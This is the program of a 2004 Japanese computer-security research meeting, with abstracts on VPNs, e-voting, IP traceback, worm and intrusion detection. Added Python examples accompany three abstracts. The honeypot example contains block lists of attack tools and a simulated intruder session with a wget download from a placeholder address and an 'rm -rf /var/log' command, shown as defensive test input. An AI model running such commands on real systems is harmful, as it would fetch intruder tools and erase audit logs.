27th CSEC Group Meeting

December 20, 2004

Information Processing Society of Japan (IPSJ)
Kagaku-kaikan (Chemistry Hall), 1-5 Kanda-Surugadai, Chiyoda-ku, Tokyo 101-0062 JAPAN


27th CSEC Group Meeting Program
(1) A Proposal of Secure VPN Construction Technology Based on Device Authentication
Tomoyuki Hoshikawa (NTT DATA CORPORATION)
Hirohisa Kamanaka (NTT DATA CORPORATION)

Today, many studies are advancing technologies that improve network security on the Internet. To distribute information safely, it is necessary to authenticate not only the user but also the device. Especially where a high level of security is required, a method that uses the tamper-resistance and authentication functions of an IC chip can be considered. A VPN (Virtual Private Network) is used as a means of safe information distribution over the Internet. In this paper, we propose a model that realizes construction of a secure VPN by coupling the device with an IC chip and further performing device authentication using environment information, and we verify its validity.

(2) A Proposal of Authentication Method Using Attribute Certificate
Yoshio KAKIZAKI (Tokai University)
Hidekazu TSUJI (Tokai University)

In the networked society, interactions are non-face-to-face and therefore anonymous, so authentication is important. However, for many services, strict identity authentication is unnecessary as long as it can be confirmed that you are a legitimate user and what authority you have. Our proposed method achieves privacy-protected exercise of authority towards the service server by using attribute certificates on a PKI.

(3) Implementation of a Fair Exchange Protocol on Smartcards
Kensaku Mori (Network Management Development Dept., NTT DoCoMo, Inc.)
Masayuki Terada (Network Management Development Dept., NTT DoCoMo, Inc.)
Kazuhiko Ishii (Network Management Development Dept., NTT DoCoMo, Inc.)
Sadayuki Hongo

This paper reports the results of our implementation of a fair exchange protocol for electronic rights on smartcards. In this implementation, we adopted TENeT, a framework that enables smartcards to communicate directly with one another, to simplify the interface between smartcards and application programs. Our implementation, built on current smartcards, can exchange electronic rights in less than 1.8 s, which is practically sufficient for electronic rights trading markets.

(4) Note on Proof of the Validity of Ballots Using a Statistical Property
Shingo Arinaga
Hiroshi Doi
Tsujii Shigeo

In electronic voting schemes with the homomorphic property, voters prove that their ballots are encryptions of valid messages. The cost of constructing the proof is proportional to the number of candidates the voter chooses among. However, when we consider electronic questionnaires with many candidates, constructing the proof becomes a heavy task for voters. In this paper, we propose a new efficient protocol for proving the validity of ballots, which reduces the voter's cost by using a statistical property.

(5) An Implementation of Anonymous Database for High Performance
Seigo Ito (Iwate Prefectural University)
Eiji Sugino (Iwate Prefectural University)
Yoshihiko Abe (Iwate Prefectural University)

(6) Efficient Traceback Method for Detecting DDoS Attacks
Toshifumi KAI (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory)
Hiroshige NAKATANI (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory)
Hiroshi SHIMIZU (Matsusita Electric Works, Ltd. Systems Technology Research Laboratory; NTT Advanced Technology Corp, Core Networks Business Headquarters System Development Unit)
Ayako SUZUKI (Kogakuin University Dept. of Computer Engineering)
Katsuji TSUKAMOTO

The amount of damage caused by illegal access is increasing with the spread of the Internet. In particular, DoS (Denial of Service) and DDoS (Distributed DoS) attacks bring systems down and often have serious impacts on society. Various attacker detection techniques have been proposed so far; this paper discusses their characteristics in terms of performance and ease of implementation. Based on that discussion, we propose a hybrid traceback method that resolves the drawbacks of the existing techniques. The advantages of the proposed scheme over the existing ones are clarified by numerical models and experiments.

(7) Reliability Feature Analysis for IP Traceback Systems
Keisuke OHMORI
Toshifumi KAI

IP traceback is a technique for locating DDoS attackers. There are many kinds of IP traceback methods, and in practical use of IP traceback systems the reliability of the system is very important. In this paper, we analyze the reliability features of typical IP traceback methods: the ICMP method, the marking method, and a newly proposed UDP method. The false negative rate and the false positive rate are the evaluation parameters for reliability. First we analyze mathematical models; then we compare the analysis with values measured on a real large network for verification.

(8) Detection of Mass Mailing Worm-infected PC Terminals by Observing DNS Query Access
Yasuo Musashi (Center for Multimedia and Information, Kumamoto University)
Kai Rannenberg (Mobile Commerce & Multilateral Security, Goethe University Frankfurt)

We have developed a new system that detects the IP addresses of mass mailing worm (MMW)-infected PC terminals solely by observing the domain name system (DNS) query traffic between the DNS server and the PC terminals.
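The kind of DNS-only detection the abstract describes, as an added example that is not the authors' system: it reads query log lines, groups MX lookups per client and flags clients that resolve many distinct destination domains within a short window. The assumption behind the feature is that a mass mailing worm delivering mail directly looks up MX records for many domains, while an ordinary client hands mail to its MTA and rarely queries MX. The log format, the thresholds and the sample lines are constructed for this example.

```python
"""Added example, not the authors' detection system: flag PC terminals that look
infected by a mass mailing worm (MMW) using nothing but the DNS query log.
Assumption: an MMW that delivers mail directly looks up MX records for many
distinct destination domains within a short time, whereas an ordinary client
hands mail to its MTA and rarely issues MX queries. Log format, thresholds and
the sample lines are constructed for this example."""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed BIND-style query log (not real traffic): .10 is a normal client,
# .23 behaves like an MMW, .44 sends a few MX queries spread over hours.
SAMPLE_LOG = """\
20-Dec-2004 10:00:01.123 client 192.168.1.10#1025: query: www.ipsj.or.jp IN A
20-Dec-2004 10:00:05.456 client 192.168.1.10#1026: query: example.ac.jp IN MX
20-Dec-2004 10:00:11.002 client 192.168.1.23#3301: query: aol.com IN MX
20-Dec-2004 10:00:11.310 client 192.168.1.23#3302: query: hotmail.com IN MX
20-Dec-2004 10:00:12.007 client 192.168.1.23#3303: query: yahoo.com IN MX
20-Dec-2004 10:00:12.550 client 192.168.1.23#3304: query: msn.com IN MX
20-Dec-2004 10:00:13.101 client 192.168.1.23#3305: query: example.net IN MX
20-Dec-2004 10:00:13.402 client 192.168.1.23#3306: query: example.org IN MX
20-Dec-2004 10:00:14.009 client 192.168.1.23#3307: query: aol.com IN MX
20-Dec-2004 10:00:14.880 client 192.168.1.23#3308: query: example.com IN MX
20-Dec-2004 10:30:00.000 client 192.168.1.44#2001: query: example.com IN MX
20-Dec-2004 11:45:00.000 client 192.168.1.44#2002: query: example.org IN MX
20-Dec-2004 13:10:00.000 client 192.168.1.44#2003: query: example.net IN MX
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2})\.\d+ client (?P<ip>[\d.]+)#\d+: "
    r"query: (?P<name>\S+) IN (?P<qtype>\w+)$"
)


def parse_line(line):
    """Return (timestamp, client_ip, qname, qtype) or None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S")
    return ts, m["ip"], m["name"].lower().rstrip("."), m["qtype"].upper()


def mx_events_by_client(lines):
    """Group MX queries as (timestamp, domain) per client; other query types are ignored."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, ip, name, qtype = rec
        if qtype == "MX":
            events[ip].append((ts, name))
    return events


def peak_distinct_mx(events, window):
    """Largest number of distinct MX domains queried inside any sliding time window."""
    events = sorted(events)
    in_window = Counter()
    start = peak = 0
    for ts, name in events:
        in_window[name] += 1
        while ts - events[start][0] > window:      # expire events older than the window
            old = events[start][1]
            in_window[old] -= 1
            if in_window[old] == 0:
                del in_window[old]
            start += 1
        peak = max(peak, len(in_window))
    return peak


def detect_mmw_clients(lines, window_seconds=60, threshold=5):
    """Map client IP -> peak distinct-MX-domain count, for clients at or above threshold."""
    window = timedelta(seconds=window_seconds)
    suspects = {}
    for ip, ev in mx_events_by_client(lines).items():
        peak = peak_distinct_mx(ev, window)
        if peak >= threshold:
            suspects[ip] = peak
    return suspects


if __name__ == "__main__":
    for ip, peak in sorted(detect_mmw_clients(SAMPLE_LOG.splitlines()).items()):
        print(f"{ip}: {peak} distinct MX domains within 60 s -> probable MMW infection")
```

Only the sliding window over distinct domains separates the worm from the slow client at .44: counting raw MX queries per day would rank both, counting distinct domains per minute flags only .23. Hosts that legitimately send mail directly (a mail relay) need an exemption list before such a rule goes into production.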

(9) A Diffusion Model of Computer Worms Using Agent-based Approach
Masayuki ISHINISHI (Air Communications and Systems Wing, JASDF)
Hideki TANUMA (The Institute of Medical Science, The University of Tokyo)
Hiroshi DEGUCHI (Interdisciplinary Graduate School of Science and Engineering, Tokyo Institute of Technology)

The increase in computer worms in recent years has caused heavy damage to the networks of public offices and enterprises, and that damage now affects people's daily lives and has become a serious problem. The authors aim to clarify diffusion phenomena through simulation in order to derive anti-virus policies. This paper proposes a diffusion model of computer worms using an agent-based approach. The authors employ the SOARS language, which is a spot-oriented model, and compare it with the conventional method.

(10) The Relationship Between Virus Spread Process and The Infected Number of Countries
KANBA KOIZUMI (Graduate School of Media and Governance, Keio University)
HIDEKI KOIKE (Graduate School of Information Systems, University of Electro-Communications)
MICHIAKI YASUMURA (Faculty of Environmental Information, Keio University)

In this paper, we analyze the relationship between the virus spread process and the number of infected countries. We investigate the dynamics of the geographical spread of viruses through the target selection mechanism. We also investigate the effect of a new scan method, named hub list scan.

(11) A Proposal and Development of a Honeypot with a Command Wrapper for Activity Restriction
KANBA KOIZUMI (Graduate School of Media and Governance, Keio University)
HIDEKI KOIKE (Graduate School of Information Systems, University of Electro-Communications)
MICHIAKI YASUMURA (Faculty of Environmental Information, Keio University)

In this paper, we propose and develop a honeypot with restricted activity. The proposed system is intended for intruder monitoring and consists of a command wrapper. The command wrapper has data capture and data control capabilities. It basically outputs dummy messages and a dummy prompt that imitate a UNIX-like OS. We explain the details of our system and the knowledge gained by monitoring intruders.
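A minimal command wrapper of the kind the abstract describes, as an added example that is not the authors' honeypot: every line the intruder types is captured together with the decision taken (data capture), nothing is ever executed, and the reply is dummy output plus a dummy prompt imitating a UNIX-like host (data control). The fake host name, directory tree, canned outputs and the policy lists are constructed for this example.

```python
"""Added example, not the authors' honeypot: a command wrapper with the two abilities
the abstract names, data capture (each typed line is recorded with the decision
taken) and data control (no command is executed; the intruder only sees dummy
output and a dummy prompt that imitate a UNIX-like OS). The fake host, canned
outputs and policy lists are constructed for this example."""
import posixpath
import shlex
from dataclasses import dataclass, field

# Constructed fake host: directory tree and canned replies for harmless commands.
FAKE_DIRS = {"/", "/root", "/tmp", "/etc", "/var", "/var/tmp", "/var/log", "/usr", "/usr/bin"}
CANNED = {
    "uname": "Linux www1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686 GNU/Linux",
    "id": "uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon)",
    "ls": "anaconda-ks.cfg  install.log  install.log.syslog",
    "w": " 10:02:11 up 41 days,  3:17,  1 user,  load average: 0.00, 0.00, 0.00",
}
# Tool-fetching commands: pretend they succeeded so the intruder carries on and reveals intent.
DOWNLOADERS = {"wget", "curl", "ftp", "lynx", "scp"}
# Commands that would damage the decoy or attack third parties: swallow silently.
BLOCKED = {"rm", "kill", "killall", "shutdown", "reboot", "halt", "nmap", "nc"}


@dataclass
class Session:
    user: str = "root"
    host: str = "www1"
    cwd: str = "/root"
    captured: list = field(default_factory=list)   # (raw line, decision)

    @property
    def prompt(self):
        """Dummy prompt in the style of a Red Hat-era bash shell."""
        base = self.cwd.rsplit("/", 1)[-1] or "/"
        return f"[{self.user}@{self.host} {base}]# "


def handle(session, line):
    """Capture the line, apply the control policy and return dummy output.

    Decisions: pass (harmless, canned reply), dummy (faked success), blocked
    (silently dropped), unknown (command not found), empty."""
    try:
        argv = shlex.split(line)
    except ValueError:                 # unbalanced quotes: fall back to whitespace split
        argv = line.split()
    if not argv:
        session.captured.append((line, "empty"))
        return ""
    cmd, args = argv[0], argv[1:]

    if cmd == "cd":
        target = posixpath.normpath(posixpath.join(session.cwd, args[0] if args else "/root"))
        if target in FAKE_DIRS:
            session.cwd = target
            decision, out = "pass", ""
        else:
            decision, out = "pass", f"-bash: cd: {target}: No such file or directory"
    elif cmd == "pwd":
        decision, out = "pass", session.cwd
    elif cmd in CANNED:
        decision, out = "pass", CANNED[cmd]
    elif cmd in DOWNLOADERS:
        name = args[-1].rsplit("/", 1)[-1] if args else "index.html"
        decision, out = "dummy", f"`{name}' saved [12288/12288]"
    elif cmd in BLOCKED:
        decision, out = "blocked", ""
    else:
        decision, out = "unknown", f"-bash: {cmd}: command not found"

    session.captured.append((line, decision))
    return out


if __name__ == "__main__":
    s = Session()
    # Constructed intruder session; 198.51.100.7 is a documentation address.
    for typed in ["uname -a", "cd /tmp", "wget http://198.51.100.7/ssh.tgz",
                  "rm -rf /var/log", "./ssh.tgz"]:
        print(s.prompt + typed)
        reply = handle(s, typed)
        if reply:
            print(reply)
    print("captured:", s.captured)
```

The wrapper answers the download with a fake "saved" line but gives the unknown `./ssh.tgz` a "command not found", so the capture log shows what the intruder tried to fetch and run without the decoy ever touching the network. A real deployment would also timestamp each captured line and forward the log off the host.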

(12) A Realization Method of Alert-Based Signatures in Network Intrusion Detection Systems
Mitsuaki Tanabe (Graduate School of Engineering, Soka University)
Yoshimi Teshigawara (Graduate School of Engineering, Soka University)

Recently, according to incident reports from JPCERT/CC, IPA and others, damage from unauthorized access and similar incidents is increasing. Therefore, the number of organizations introducing security products such as firewalls, anti-virus software and intrusion detection systems is also increasing. However, the incorrect detections produced by intrusion detection system products have become a serious problem. In this research, focusing on false positives among the incorrect detections, we propose a realization method that creates alert-based signatures to decrease false positives.

(13) A Performance-tuning Method in Intrusion Detection using Bayesian Networks
Tsunemasa Hayashi
Stephanie Fung
Ryosuke Kurebayashi
Kiyoshi Kobayashi
Satoru Ohta

We construct an anomaly-based Intrusion Detection System (IDS) using Bayesian networks to protect a computer network (or host device) from malicious traffic. This type of IDS is capable of detecting new variants of attacks. In this paper, we propose a performance-tuning method that reduces the size of the Bayesian networks, and show that our method reduces the computational cost without degrading detection performance. We then propose an IDS structure that achieves high-speed operation.

(14) Unified Log Management and Abnormal Log Detection System

In recent years, illegal accesses to computer networks have been increasing, and the use of equipment such as firewalls has become common. However, such equipment may not block illegal access perfectly, so investigation and countermeasures must be repeated. Only engineers with advanced skills can carry out such investigation and countermeasures, and it is difficult even to conduct efficient and effective investigation because, especially in large-scale environments, incidents occur on many nodes. We therefore aim at the management and analysis of logs, and in order to carry these out efficiently we are studying and developing a unified log management system.

(15) Data Separation for Distributed Storage System Considering Loss of Segments
Hitoshi HIRANO (Dept. of Computer Science, National Defense Academy)
Yasuhiro NAKAMURA (Dept. of Computer Science, National Defense Academy)

Distributed Storage System has been proposed as one form of network file sharing system for small peer-to-peer network environments [3]. The method divides a target file into small segments, adds header information to each segment and distributes the segments over the network. However, a problem remains: the system cannot restore the shared file when some segments on cooperating nodes are lost for some reason. It is therefore necessary to build the data segments using a redundancy code. This paper proposes an additional scheme that enables high-performance distribution with user-oriented coding control. The method improves the durability of Distributed Storage System through flexible coding control, and as a result an implementation of Distributed Storage System with fault tolerance and publicity control is achieved independently of other network storage.
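The segment-plus-header layout with a redundancy code, as an added example that is not the paper's scheme: a file is cut into k data segments, each gets a header (index, k, original length, SHA-256 of the payload), and one XOR parity segment is appended so the file can be restored when any single segment is lost or corrupted. The header layout and the single-parity code are assumptions chosen for illustration; the paper's user-oriented coding control and the distribution of segments to nodes are not modelled.

```python
"""Added example, not the paper's scheme: divide a file into k segments, attach a
header to each, and add one XOR parity segment so the file can still be restored
after any single segment is lost or corrupted. The header layout and the
one-parity-segment code are assumptions chosen for this illustration; the
paper's user-oriented coding control and the distribution to nodes are not
modelled here."""
import hashlib
import struct

MAGIC = b"DSS1"
# magic | segment index (index k is the parity) | k | original length | SHA-256 of payload
HEADER = struct.Struct(">4sBBI32s")


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def split_with_parity(data, k):
    """Return k data segments plus one parity segment, each as header + payload."""
    if not 1 <= k <= 254:
        raise ValueError("k must be between 1 and 254")
    seg_len = max(1, -(-len(data) // k))                       # ceiling division
    padded = data.ljust(seg_len * k, b"\0")                    # pad so all segments are equal
    chunks = [padded[i * seg_len:(i + 1) * seg_len] for i in range(k)]
    parity = bytes(seg_len)
    for chunk in chunks:
        parity = _xor(parity, chunk)
    chunks.append(parity)
    return [HEADER.pack(MAGIC, i, k, len(data), hashlib.sha256(c).digest()) + c
            for i, c in enumerate(chunks)]


def restore(segments):
    """Rebuild the file from any k intact segments; damaged segments are detected and dropped."""
    good, k, length = {}, None, None
    for seg in segments:
        if len(seg) < HEADER.size:
            continue
        magic, idx, seg_k, orig_len, digest = HEADER.unpack(seg[:HEADER.size])
        payload = seg[HEADER.size:]
        if magic != MAGIC or hashlib.sha256(payload).digest() != digest:
            continue                                           # corrupted: treat as lost
        if k is None:
            k, length = seg_k, orig_len
        elif (seg_k, orig_len) != (k, length):
            continue                                           # belongs to another file
        good[idx] = payload
    if k is None:
        raise ValueError("no intact segments")
    missing = [i for i in range(k) if i not in good]
    if len(missing) == 1 and k in good:                        # one data segment lost, parity present
        rebuilt = good[k]
        for i, payload in good.items():
            if i != k:
                rebuilt = _xor(rebuilt, payload)
        good[missing[0]] = rebuilt
        missing = []
    if missing:
        raise ValueError(f"cannot restore: data segments {missing} lost; one parity covers only one loss")
    return b"".join(good[i] for i in range(k))[:length]


if __name__ == "__main__":
    sample = b"Distributed Storage System sample payload " * 20      # constructed input
    segs = split_with_parity(sample, 4)
    print(len(segs), "segments of", len(segs[0]), "bytes each")
    print("restore without segment 2:", restore(segs[:2] + segs[3:]) == sample)
```

The per-segment digest is what turns silent corruption into a recoverable loss: a flipped byte in a payload makes that segment fail verification, and the parity then rebuilds it. Losing two data segments exceeds what one XOR parity can cover, which is the point at which a Reed-Solomon style code with more parity segments would be chosen instead.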

(16) A Policy Description Language for Policy-based Security Management
Sumitaka OKAJO (Internet Systems Research Laboratories, NEC Corp.)
Katsushi MATSUDA (Internet Systems Research Laboratories, NEC Corp.)
Ryuichi OGAWA (Internet Systems Research Laboratories, NEC Corp.)

In order to protect networks against security threats, many security components with various security functions have been deployed, and the configuration and management of those components is highly complex. Therefore, a security policy management system is needed to reduce the system administrator's load. This paper presents a common security policy language, SCCML (Security Configuration Coordinator Markup Language), which can express various configurations of security components. SCCML has three features: (1) it expresses both access control and monitoring policies, (2) it expresses multiple security functions in one policy, and (3) it expresses the details of a specific device.

(17) Grasping the Security Management Situation by Functional Mapping
Katsushi MATSUDA (Internet System Research Laboratories, NEC)
Sumitaka OKAJO (Internet System Research Laboratories, NEC)
Ryuichi OGAWA (Internet System Research Laboratories, NEC)

There is a great expressive gap between a security policy and the actual security parameters used in security management, and consequently policy-based security management can be difficult to accomplish. In this paper, we propose a new security policy description method that is simple and consistent, and also describe a functional mapping technique that matches each fragment of a security policy with a software or hardware node in the network system. The description helps security administrators draw up security policies without omissions, and the functional mapping helps them grasp their security management situation and discover inadequate pieces of policy or nodes in the network system from the mapped result.
